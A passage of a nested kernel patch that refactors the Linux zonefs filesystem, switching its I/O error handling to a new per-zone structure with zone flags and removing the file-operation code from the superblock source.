++	z->z_flags &= ~ZONEFS_ZONE_INIT_MODE;
++}
++
+ struct zonefs_ioerr_data {
+ 	struct inode	*inode;
+ 	bool		write;
+@@ -377,7 +255,7 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ {
+ 	struct zonefs_ioerr_data *err = data;
+ 	struct inode *inode = err->inode;
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 	loff_t isize, data_size;
+@@ -388,10 +266,9 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * as there is no inconsistency between the inode size and the amount of
+ 	 * data writen in the zone (data_size).
+ 	 */
+-	data_size = zonefs_check_zone_condition(inode, zone, true, false);
++	data_size = zonefs_check_zone_condition(sb, z, zone);
+ 	isize = i_size_read(inode);
+-	if (zone->cond != BLK_ZONE_COND_OFFLINE &&
+-	    zone->cond != BLK_ZONE_COND_READONLY &&
++	if (!(z->z_flags & (ZONEFS_ZONE_READONLY | ZONEFS_ZONE_OFFLINE)) &&
+ 	    !err->write && isize == data_size)
+ 		return 0;
+ 
+@@ -414,8 +291,9 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * In all cases, warn about inode size inconsistency and handle the
+ 	 * IO error according to the zone condition and to the mount options.
+ 	 */
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ && isize != data_size)
+-		zonefs_warn(sb, "inode %lu: invalid size %lld (should be %lld)\n",
++	if (zonefs_zone_is_seq(z) && isize != data_size)
++		zonefs_warn(sb,
++			    "inode %lu: invalid size %lld (should be %lld)\n",
+ 			    inode->i_ino, isize, data_size);
+ 
+ 	/*
+@@ -424,24 +302,22 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * zone condition to read-only and offline respectively, as if the
+ 	 * condition was signaled by the hardware.
+ 	 */
+-	if (zone->cond == BLK_ZONE_COND_OFFLINE ||
+-	    sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL) {
++	if ((z->z_flags & ZONEFS_ZONE_OFFLINE) ||
++	    (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL)) {
+ 		zonefs_warn(sb, "inode %lu: read/write access disabled\n",
+ 			    inode->i_ino);
+-		if (zone->cond != BLK_ZONE_COND_OFFLINE) {
+-			zone->cond = BLK_ZONE_COND_OFFLINE;
+-			data_size = zonefs_check_zone_condition(inode, zone,
+-								false, false);
+-		}
+-	} else if (zone->cond == BLK_ZONE_COND_READONLY ||
+-		   sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO) {
++		if (!(z->z_flags & ZONEFS_ZONE_OFFLINE))
++			z->z_flags |= ZONEFS_ZONE_OFFLINE;
++		zonefs_inode_update_mode(inode);
++		data_size = 0;
++	} else if ((z->z_flags & ZONEFS_ZONE_READONLY) ||
++		   (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO)) {
+ 		zonefs_warn(sb, "inode %lu: write access disabled\n",
+ 			    inode->i_ino);
+-		if (zone->cond != BLK_ZONE_COND_READONLY) {
+-			zone->cond = BLK_ZONE_COND_READONLY;
+-			data_size = zonefs_check_zone_condition(inode, zone,
+-								false, false);
+-		}
++		if (!(z->z_flags & ZONEFS_ZONE_READONLY))
++			z->z_flags |= ZONEFS_ZONE_READONLY;
++		zonefs_inode_update_mode(inode);
++		data_size = isize;
+ 	} else if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO &&
+ 		   data_size > isize) {
+ 		/* Do not expose garbage data */
+@@ -455,9 +331,8 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * close of the zone when the inode file is closed.
+ 	 */
+ 	if ((sbi->s_mount_opts & ZONEFS_MNTOPT_EXPLICIT_OPEN) &&
+-	    (zone->cond == BLK_ZONE_COND_OFFLINE ||
+-	     zone->cond == BLK_ZONE_COND_READONLY))
+-		zi->i_flags &= ~ZONEFS_ZONE_OPEN;
++	    (z->z_flags & (ZONEFS_ZONE_READONLY | ZONEFS_ZONE_OFFLINE)))
++		z->z_flags &= ~ZONEFS_ZONE_OPEN;
+ 
+ 	/*
+ 	 * If error=remount-ro was specified, any error result in remounting
+@@ -474,8 +349,8 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 */
+ 	zonefs_update_stats(inode, data_size);
+ 	zonefs_i_size_write(inode, data_size);
+-	zi->i_wpoffset = data_size;
+-	zonefs_account_active(inode);
++	z->z_wpoffset = data_size;
++	zonefs_inode_account_active(inode);
+ 
+ 	return 0;
+ }
+@@ -487,9 +362,9 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+  * eventually correct the file size and zonefs inode write pointer offset
+  * (which can be out of sync with the drive due to partial write failures).
+  */
+-static void __zonefs_io_error(struct inode *inode, bool write)
++void __zonefs_io_error(struct inode *inode, bool write)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 	unsigned int noio_flag;
+@@ -505,8 +380,8 @@ static void __zonefs_io_error(struct inode *inode, bool write)
+ 	 * files with aggregated conventional zones, for which the inode zone
+ 	 * size is always larger than the device zone size.
+ 	 */
+-	if (zi->i_zone_size > bdev_zone_sectors(sb->s_bdev))
+-		nr_zones = zi->i_zone_size >>
++	if (z->z_size > bdev_zone_sectors(sb->s_bdev))
++		nr_zones = z->z_size >>
+ 			(sbi->s_zone_sectors_shift + SECTOR_SHIFT);
+ 
+ 	/*
+@@ -518,7 +393,7 @@ static void __zonefs_io_error(struct inode *inode, bool write)
+ 	 * the GFP_NOIO context avoids both problems.
+ 	 */
+ 	noio_flag = memalloc_noio_save();
+-	ret = blkdev_report_zones(sb->s_bdev, zi->i_zsector, nr_zones,
++	ret = blkdev_report_zones(sb->s_bdev, z->z_sector, nr_zones,
+ 				  zonefs_io_error_cb, &err);
+ 	if (ret != nr_zones)
+ 		zonefs_err(sb, "Get inode %lu zone information failed %d\n",
+@@ -526,749 +401,6 @@ static void __zonefs_io_error(struct inode *inode, bool write)
+ 	memalloc_noio_restore(noio_flag);
+ }
+ 
+-static void zonefs_io_error(struct inode *inode, bool write)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-	__zonefs_io_error(inode, write);
+-	mutex_unlock(&zi->i_truncate_mutex);
+-}
+-
+-static int zonefs_file_truncate(struct inode *inode, loff_t isize)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	loff_t old_isize;
+-	enum req_op op;
+-	int ret = 0;
+-
+-	/*
+-	 * Only sequential zone files can be truncated and truncation is allowed
+-	 * only down to a 0 size, which is equivalent to a zone reset, and to
+-	 * the maximum file size, which is equivalent to a zone finish.
+-	 */
+-	if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
+-		return -EPERM;
+-
+-	if (!isize)
+-		op = REQ_OP_ZONE_RESET;
+-	else if (isize == zi->i_max_size)
+-		op = REQ_OP_ZONE_FINISH;
+-	else
+-		return -EPERM;
+-
+-	inode_dio_wait(inode);
+-
+-	/* Serialize against page faults */
+-	filemap_invalidate_lock(inode->i_mapping);
+-
+-	/* Serialize against zonefs_iomap_begin() */
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	old_isize = i_size_read(inode);
+-	if (isize == old_isize)
+-		goto unlock;
+-
+-	ret = zonefs_zone_mgmt(inode, op);
+-	if (ret)
+-		goto unlock;
+-
+-	/*
+-	 * If the mount option ZONEFS_MNTOPT_EXPLICIT_OPEN is set,
+-	 * take care of open zones.
+-	 */
+-	if (zi->i_flags & ZONEFS_ZONE_OPEN) {
+-		/*
+-		 * Truncating a zone to EMPTY or FULL is the equivalent of
+-		 * closing the zone. For a truncation to 0, we need to
+-		 * re-open the zone to ensure new writes can be processed.
+-		 * For a truncation to the maximum file size, the zone is
+-		 * closed and writes cannot be accepted anymore, so clear
+-		 * the open flag.
+-		 */
+-		if (!isize)
+-			ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_OPEN);
+-		else
+-			zi->i_flags &= ~ZONEFS_ZONE_OPEN;
+-	}
+-
+-	zonefs_update_stats(inode, isize);
+-	truncate_setsize(inode, isize);
+-	zi->i_wpoffset = isize;
+-	zonefs_account_active(inode);
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-	filemap_invalidate_unlock(inode->i_mapping);
+-
+-	return ret;
+-}
+-
+-static int zonefs_inode_setattr(struct user_namespace *mnt_userns,
+-				struct dentry *dentry, struct iattr *iattr)
+-{
+-	struct inode *inode = d_inode(dentry);
+-	int ret;
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return -EPERM;
+-
+-	ret = setattr_prepare(&init_user_ns, dentry, iattr);
+-	if (ret)
+-		return ret;
+-
+-	/*
+-	 * Since files and directories cannot be created nor deleted, do not
+-	 * allow setting any write attributes on the sub-directories grouping
+-	 * files by zone type.
+-	 */
+-	if ((iattr->ia_valid & ATTR_MODE) && S_ISDIR(inode->i_mode) &&
+-	    (iattr->ia_mode & 0222))
+-		return -EPERM;
+-
+-	if (((iattr->ia_valid & ATTR_UID) &&
+-	     !uid_eq(iattr->ia_uid, inode->i_uid)) ||
+-	    ((iattr->ia_valid & ATTR_GID) &&
+-	     !gid_eq(iattr->ia_gid, inode->i_gid))) {
+-		ret = dquot_transfer(mnt_userns, inode, iattr);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	if (iattr->ia_valid & ATTR_SIZE) {
+-		ret = zonefs_file_truncate(inode, iattr->ia_size);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	setattr_copy(&init_user_ns, inode, iattr);
+-
+-	return 0;
+-}
+-
+-static const struct inode_operations zonefs_file_inode_operations = {
+-	.setattr	= zonefs_inode_setattr,
+-};
+-
+-static int zonefs_file_fsync(struct file *file, loff_t start, loff_t end,
+-			     int datasync)
+-{
+-	struct inode *inode = file_inode(file);
+-	int ret = 0;
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return -EPERM;
+-
+-	/*
+-	 * Since only direct writes are allowed in sequential files, page cache
+-	 * flush is needed only for conventional zone files.
+-	 */
+-	if (ZONEFS_I(inode)->i_ztype == ZONEFS_ZTYPE_CNV)
+-		ret = file_write_and_wait_range(file, start, end);
+-	if (!ret)
+-		ret = blkdev_issue_flush(inode->i_sb->s_bdev);
+-
+-	if (ret)
+-		zonefs_io_error(inode, true);
+-
+-	return ret;
+-}
+-
+-static vm_fault_t zonefs_filemap_page_mkwrite(struct vm_fault *vmf)
+-{
+-	struct inode *inode = file_inode(vmf->vma->vm_file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	vm_fault_t ret;
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return VM_FAULT_SIGBUS;
+-
+-	/*
+-	 * Sanity check: only conventional zone files can have shared
+-	 * writeable mappings.
+-	 */
+-	if (WARN_ON_ONCE(zi->i_ztype != ZONEFS_ZTYPE_CNV))
+-		return VM_FAULT_NOPAGE;
+-
+-	sb_start_pagefault(inode->i_sb);
+-	file_update_time(vmf->vma->vm_file);
+-
+-	/* Serialize against truncates */
+-	filemap_invalidate_lock_shared(inode->i_mapping);
+-	ret = iomap_page_mkwrite(vmf, &zonefs_write_iomap_ops);
+-	filemap_invalidate_unlock_shared(inode->i_mapping);
+-
+-	sb_end_pagefault(inode->i_sb);
+-	return ret;
+-}
+-
+-static const struct vm_operations_struct zonefs_file_vm_ops = {
+-	.fault		= filemap_fault,
+-	.map_pages	= filemap_map_pages,
+-	.page_mkwrite	= zonefs_filemap_page_mkwrite,
+-};
+-
+-static int zonefs_file_mmap(struct file *file, struct vm_area_struct *vma)
+-{
+-	/*
+-	 * Conventional zones accept random writes, so their files can support
+-	 * shared writable mappings. For sequential zone files, only read
+-	 * mappings are possible since there are no guarantees for write
+-	 * ordering between msync() and page cache writeback.
+-	 */
+-	if (ZONEFS_I(file_inode(file))->i_ztype == ZONEFS_ZTYPE_SEQ &&
+-	    (vma->vm_flags & VM_SHARED) && (vma->vm_flags & VM_MAYWRITE))
+-		return -EINVAL;
+-
+-	file_accessed(file);
+-	vma->vm_ops = &zonefs_file_vm_ops;
+-
+-	return 0;
+-}
+-
+-static loff_t zonefs_file_llseek(struct file *file, loff_t offset, int whence)
+-{
+-	loff_t isize = i_size_read(file_inode(file));
+-
+-	/*
+-	 * Seeks are limited to below the zone size for conventional zones
+-	 * and below the zone write pointer for sequential zones. In both
+-	 * cases, this limit is the inode size.
+-	 */
+-	return generic_file_llseek_size(file, offset, whence, isize, isize);
+-}
+-
+-static int zonefs_file_write_dio_end_io(struct kiocb *iocb, ssize_t size,
+-					int error, unsigned int flags)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	if (error) {
+-		zonefs_io_error(inode, true);
+-		return error;
+-	}
+-
+-	if (size && zi->i_ztype != ZONEFS_ZTYPE_CNV) {
+-		/*
+-		 * Note that we may be seeing completions out of order,
+-		 * but that is not a problem since a write completed
+-		 * successfully necessarily means that all preceding writes
+-		 * were also successful. So we can safely increase the inode
+-		 * size to the write end location.
+-		 */
+-		mutex_lock(&zi->i_truncate_mutex);
+-		if (i_size_read(inode) < iocb->ki_pos + size) {
+-			zonefs_update_stats(inode, iocb->ki_pos + size);
+-			zonefs_i_size_write(inode, iocb->ki_pos + size);
+-		}
+-		mutex_unlock(&zi->i_truncate_mutex);
+-	}
+-
+-	return 0;
+-}
+-
+-static const struct iomap_dio_ops zonefs_write_dio_ops = {
+-	.end_io			= zonefs_file_write_dio_end_io,
+-};
+-
+-static ssize_t zonefs_file_dio_append(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct block_device *bdev = inode->i_sb->s_bdev;
+-	unsigned int max = bdev_max_zone_append_sectors(bdev);
+-	struct bio *bio;
+-	ssize_t size;
+-	int nr_pages;
+-	ssize_t ret;
+-
+-	max = ALIGN_DOWN(max << SECTOR_SHIFT, inode->i_sb->s_blocksize);
+-	iov_iter_truncate(from, max);
+-
+-	nr_pages = iov_iter_npages(from, BIO_MAX_VECS);
+-	if (!nr_pages)
+-		return 0;
+-
+-	bio = bio_alloc(bdev, nr_pages,
+-			REQ_OP_ZONE_APPEND | REQ_SYNC | REQ_IDLE, GFP_NOFS);
+-	bio->bi_iter.bi_sector = zi->i_zsector;
+-	bio->bi_ioprio = iocb->ki_ioprio;
+-	if (iocb_is_dsync(iocb))
+-		bio->bi_opf |= REQ_FUA;
+-
+-	ret = bio_iov_iter_get_pages(bio, from);
+-	if (unlikely(ret))
+-		goto out_release;
+-
+-	size = bio->bi_iter.bi_size;
+-	task_io_account_write(size);
+-
+-	if (iocb->ki_flags & IOCB_HIPRI)
+-		bio_set_polled(bio, iocb);
+-
+-	ret = submit_bio_wait(bio);
+-
+-	/*
+-	 * If the file zone was written underneath the file system, the zone
+-	 * write pointer may not be where we expect it to be, but the zone
+-	 * append write can still succeed. So check manually that we wrote where
+-	 * we intended to, that is, at zi->i_wpoffset.
+-	 */
+-	if (!ret) {
+-		sector_t wpsector =
+-			zi->i_zsector + (zi->i_wpoffset >> SECTOR_SHIFT);
+-
+-		if (bio->bi_iter.bi_sector != wpsector) {
+-			zonefs_warn(inode->i_sb,
+-				"Corrupted write pointer %llu for zone at %llu\n",
+-				wpsector, zi->i_zsector);
+-			ret = -EIO;
+-		}
+-	}
+-
+-	zonefs_file_write_dio_end_io(iocb, size, ret, 0);
+-	trace_zonefs_file_dio_append(inode, size, ret);
+-
+-out_release:
+-	bio_release_pages(bio, false);
+-	bio_put(bio);
+-
+-	if (ret >= 0) {
+-		iocb->ki_pos += size;
+-		return size;
+-	}
+-
+-	return ret;
+-}
+-
+-/*
+- * Do not exceed the LFS limits nor the file zone size. If pos is under the
+- * limit it becomes a short access. If it exceeds the limit, return -EFBIG.
+- */
+-static loff_t zonefs_write_check_limits(struct file *file, loff_t pos,
+-					loff_t count)
+-{
+-	struct inode *inode = file_inode(file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	loff_t limit = rlimit(RLIMIT_FSIZE);
+-	loff_t max_size = zi->i_max_size;
+-
+-	if (limit != RLIM_INFINITY) {
+-		if (pos >= limit) {
+-			send_sig(SIGXFSZ, current, 0);
+-			return -EFBIG;
+-		}
+-		count = min(count, limit - pos);
+-	}
+-
+-	if (!(file->f_flags & O_LARGEFILE))
+-		max_size = min_t(loff_t, MAX_NON_LFS, max_size);
+-
+-	if (unlikely(pos >= max_size))
+-		return -EFBIG;
+-
+-	return min(count, max_size - pos);
+-}
+-
+-static ssize_t zonefs_write_checks(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct file *file = iocb->ki_filp;
+-	struct inode *inode = file_inode(file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	loff_t count;
+-
+-	if (IS_SWAPFILE(inode))
+-		return -ETXTBSY;
+-
+-	if (!iov_iter_count(from))
+-		return 0;
+-
+-	if ((iocb->ki_flags & IOCB_NOWAIT) && !(iocb->ki_flags & IOCB_DIRECT))
+-		return -EINVAL;
+-
+-	if (iocb->ki_flags & IOCB_APPEND) {
+-		if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
+-			return -EINVAL;
+-		mutex_lock(&zi->i_truncate_mutex);
+-		iocb->ki_pos = zi->i_wpoffset;
+-		mutex_unlock(&zi->i_truncate_mutex);
+-	}
+-
+-	count = zonefs_write_check_limits(file, iocb->ki_pos,
+-					  iov_iter_count(from));
+-	if (count < 0)
+-		return count;
+-
+-	iov_iter_truncate(from, count);
+-	return iov_iter_count(from);
+-}
+-
+-/*
+- * Handle direct writes. For sequential zone files, this is the only possible
+- * write path. For these files, check that the user is issuing writes
+- * sequentially from the end of the file. This code assumes that the block layer
+- * delivers write requests to the device in sequential order. This is always the
+- * case if a block IO scheduler implementing the ELEVATOR_F_ZBD_SEQ_WRITE
+- * elevator feature is being used (e.g. mq-deadline). The block layer always
+- * automatically select such an elevator for zoned block devices during the
+- * device initialization.
+- */
+-static ssize_t zonefs_file_dio_write(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	bool sync = is_sync_kiocb(iocb);
+-	bool append = false;
+-	ssize_t ret, count;
+-
+-	/*
+-	 * For async direct IOs to sequential zone files, refuse IOCB_NOWAIT
+-	 * as this can cause write reordering (e.g. the first aio gets EAGAIN
+-	 * on the inode lock but the second goes through but is now unaligned).
+-	 */
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ && !sync &&
+-	    (iocb->ki_flags & IOCB_NOWAIT))
+-		return -EOPNOTSUPP;
+-
+-	if (iocb->ki_flags & IOCB_NOWAIT) {
+-		if (!inode_trylock(inode))
+-			return -EAGAIN;
+-	} else {
+-		inode_lock(inode);
+-	}
+-
+-	count = zonefs_write_checks(iocb, from);
+-	if (count <= 0) {
+-		ret = count;
+-		goto inode_unlock;
+-	}
+-
+-	if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
+-		ret = -EINVAL;
+-		goto inode_unlock;
+-	}
+-
+-	/* Enforce sequential writes (append only) in sequential zones */
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ) {
+-		mutex_lock(&zi->i_truncate_mutex);
+-		if (iocb->ki_pos != zi->i_wpoffset) {
+-			mutex_unlock(&zi->i_truncate_mutex);
+-			ret = -EINVAL;
+-			goto inode_unlock;
+-		}
+-		mutex_unlock(&zi->i_truncate_mutex);
+-		append = sync;
+-	}
+-
+-	if (append)
+-		ret = zonefs_file_dio_append(iocb, from);
+-	else
+-		ret = iomap_dio_rw(iocb, from, &zonefs_write_iomap_ops,
+-				   &zonefs_write_dio_ops, 0, NULL, 0);
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ &&
+-	    (ret > 0 || ret == -EIOCBQUEUED)) {
+-		if (ret > 0)
+-			count = ret;
+-
+-		/*
+-		 * Update the zone write pointer offset assuming the write
+-		 * operation succeeded. If it did not, the error recovery path
+-		 * will correct it. Also do active seq file accounting.
+-		 */
+-		mutex_lock(&zi->i_truncate_mutex);
+-		zi->i_wpoffset += count;
+-		zonefs_account_active(inode);
+-		mutex_unlock(&zi->i_truncate_mutex);
+-	}
+-
+-inode_unlock:
+-	inode_unlock(inode);
+-
+-	return ret;
+-}
+-
+-static ssize_t zonefs_file_buffered_write(struct kiocb *iocb,
+-					  struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	ssize_t ret;
+-
+-	/*
+-	 * Direct IO writes are mandatory for sequential zone files so that the
+-	 * write IO issuing order is preserved.
+-	 */
+-	if (zi->i_ztype != ZONEFS_ZTYPE_CNV)
+-		return -EIO;
+-
+-	if (iocb->ki_flags & IOCB_NOWAIT) {
+-		if (!inode_trylock(inode))
+-			return -EAGAIN;
+-	} else {
+-		inode_lock(inode);
+-	}
+-
+-	ret = zonefs_write_checks(iocb, from);
+-	if (ret <= 0)
+-		goto inode_unlock;
+-
+-	ret = iomap_file_buffered_write(iocb, from, &zonefs_write_iomap_ops);
+-	if (ret > 0)
+-		iocb->ki_pos += ret;
+-	else if (ret == -EIO)
+-		zonefs_io_error(inode, true);
+-
+-inode_unlock:
+-	inode_unlock(inode);
+-	if (ret > 0)
+-		ret = generic_write_sync(iocb, ret);
+-
+-	return ret;
+-}
+-
+-static ssize_t zonefs_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return -EPERM;
+-
+-	if (sb_rdonly(inode->i_sb))
+-		return -EROFS;
+-
+-	/* Write operations beyond the zone size are not allowed */
+-	if (iocb->ki_pos >= ZONEFS_I(inode)->i_max_size)
+-		return -EFBIG;
+-
+-	if (iocb->ki_flags & IOCB_DIRECT) {
+-		ssize_t ret = zonefs_file_dio_write(iocb, from);
+-		if (ret != -ENOTBLK)
+-			return ret;
+-	}
+-
+-	return zonefs_file_buffered_write(iocb, from);
+-}
+-
+-static int zonefs_file_read_dio_end_io(struct kiocb *iocb, ssize_t size,
+-				       int error, unsigned int flags)
+-{
+-	if (error) {
+-		zonefs_io_error(file_inode(iocb->ki_filp), false);
+-		return error;
+-	}
+-
+-	return 0;
+-}
+-
+-static const struct iomap_dio_ops zonefs_read_dio_ops = {
+-	.end_io			= zonefs_file_read_dio_end_io,
+-};
+-
+-static ssize_t zonefs_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	loff_t isize;
+-	ssize_t ret;
+-
+-	/* Offline zones cannot be read */
+-	if (unlikely(IS_IMMUTABLE(inode) && !(inode->i_mode & 0777)))
+-		return -EPERM;
+-
+-	if (iocb->ki_pos >= zi->i_max_size)
+-		return 0;
+-
+-	if (iocb->ki_flags & IOCB_NOWAIT) {
+-		if (!inode_trylock_shared(inode))
+-			return -EAGAIN;
+-	} else {
+-		inode_lock_shared(inode);
+-	}
+-
+-	/* Limit read operations to written data */
+-	mutex_lock(&zi->i_truncate_mutex);
+-	isize = i_size_read(inode);
+-	if (iocb->ki_pos >= isize) {
+-		mutex_unlock(&zi->i_truncate_mutex);
+-		ret = 0;
+-		goto inode_unlock;
+-	}
+-	iov_iter_truncate(to, isize - iocb->ki_pos);
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	if (iocb->ki_flags & IOCB_DIRECT) {
+-		size_t count = iov_iter_count(to);
+-
+-		if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
+-			ret = -EINVAL;
+-			goto inode_unlock;
+-		}
+-		file_accessed(iocb->ki_filp);
+-		ret = iomap_dio_rw(iocb, to, &zonefs_read_iomap_ops,
+-				   &zonefs_read_dio_ops, 0, NULL, 0);
+-	} else {
+-		ret = generic_file_read_iter(iocb, to);
+-		if (ret == -EIO)
+-			zonefs_io_error(inode, false);
+-	}
+-
+-inode_unlock:
+-	inode_unlock_shared(inode);
+-
+-	return ret;
+-}
+-
+-/*
+- * Write open accounting is done only for sequential files.
+- */
+-static inline bool zonefs_seq_file_need_wro(struct inode *inode,
+-					    struct file *file)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
+-		return false;
+-
+-	if (!(file->f_mode & FMODE_WRITE))
+-		return false;
+-
+-	return true;
+-}
+-
+-static int zonefs_seq_file_write_open(struct inode *inode)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	int ret = 0;
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	if (!zi->i_wr_refcnt) {
+-		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+-		unsigned int wro = atomic_inc_return(&sbi->s_wro_seq_files);
+-
+-		if (sbi->s_mount_opts & ZONEFS_MNTOPT_EXPLICIT_OPEN) {
+-
+-			if (sbi->s_max_wro_seq_files
+-			    && wro > sbi->s_max_wro_seq_files) {
+-				atomic_dec(&sbi->s_wro_seq_files);
+-				ret = -EBUSY;
+-				goto unlock;
+-			}
+-
+-			if (i_size_read(inode) < zi->i_max_size) {
+-				ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_OPEN);
+-				if (ret) {
+-					atomic_dec(&sbi->s_wro_seq_files);
+-					goto unlock;
+-				}
+-				zi->i_flags |= ZONEFS_ZONE_OPEN;
+-				zonefs_account_active(inode);
+-			}
+-		}
+-	}
+-
+-	zi->i_wr_refcnt++;
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	return ret;
+-}
+-
+-static int zonefs_file_open(struct inode *inode, struct file *file)
+-{
+-	int ret;
+-
+-	ret = generic_file_open(inode, file);
+-	if (ret)
+-		return ret;
+-
+-	if (zonefs_seq_file_need_wro(inode, file))
+-		return zonefs_seq_file_write_open(inode);
+-
+-	return 0;
+-}
+-
+-static void zonefs_seq_file_write_close(struct inode *inode)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+-	int ret = 0;
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	zi->i_wr_refcnt--;
+-	if (zi->i_wr_refcnt)
+-		goto unlock;
+-
+-	/*
+-	 * The file zone may not be open anymore (e.g. the file was truncated to
+-	 * its maximum size or it was fully written). For this case, we only
+-	 * need to decrement the write open count.
+-	 */
+-	if (zi->i_flags & ZONEFS_ZONE_OPEN) {
+-		ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_CLOSE);
+-		if (ret) {
+-			__zonefs_io_error(inode, false);
+-			/*
+-			 * Leaving zones explicitly open may lead to a state
+-			 * where most zones cannot be written (zone resources
+-			 * exhausted). So take preventive action by remounting
+-			 * read-only.
+-			 */
+-			if (zi->i_flags & ZONEFS_ZONE_OPEN &&
+-			    !(sb->s_flags & SB_RDONLY)) {
+-				zonefs_warn(sb,
+-					"closing zone at %llu failed %d\n",
+-					zi->i_zsector, ret);
+-				zonefs_warn(sb,
+-					"remounting filesystem read-only\n");
+-				sb->s_flags |= SB_RDONLY;
+-			}
+-			goto unlock;
+-		}
+-
+-		zi->i_flags &= ~ZONEFS_ZONE_OPEN;
+-		zonefs_account_active(inode);
+-	}
+-
+-	atomic_dec(&sbi->s_wro_seq_files);
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-}
+-
+-static int zonefs_file_release(struct inode *inode, struct file *file)
+-{
+-	/*
+-	 * If we explicitly open a zone we must close it again as well, but the
+-	 * zone management operation can fail (either due to an IO error or as
+-	 * the zone has gone offline or read-only). Make sure we don't fail the
+-	 * close(2) for user-space.
+-	 */
+-	if (zonefs_seq_file_need_wro(inode, file))
+-		zonefs_seq_file_write_close(inode);
+-
+-	return 0;
+-}
+-
+-static const struct file_operations zonefs_file_operations = {
+-	.open		= zonefs_file_open,
+-	.release	= zonefs_file_release,
+-	.fsync		= zonefs_file_fsync,
+-	.mmap		= zonefs_file_mmap,
+-	.llseek		= zonefs_file_llseek,
+-	.read_iter	= zonefs_file_read_iter,
+-	.write_iter	= zonefs_file_write_iter,
+-	.splice_read	= generic_file_splice_read,
+-	.splice_write	= iter_file_splice_write,
+-	.iopoll		= iocb_bio_iopoll,
+-};
+-
+ static struct kmem_cache *zonefs_inode_cachep;
+ 
+ static struct inode *zonefs_alloc_inode(struct super_block *sb)
+@@ -1282,7 +414,6 @@ static struct inode *zonefs_alloc_inode(struct super_block *sb)
+ 	inode_init_once(&zi->i_vnode);
+ 	mutex_init(&zi->i_truncate_mutex);
+ 	zi->i_wr_refcnt = 0;
+-	zi->i_flags = 0;
+ 
+ 	return &zi->i_vnode;
+ }
+@@ -1315,8 +446,8 @@ static int zonefs_statfs(struct dentry *dentry, struct kstatfs *buf)
+ 	buf->f_bavail = buf->f_bfree;
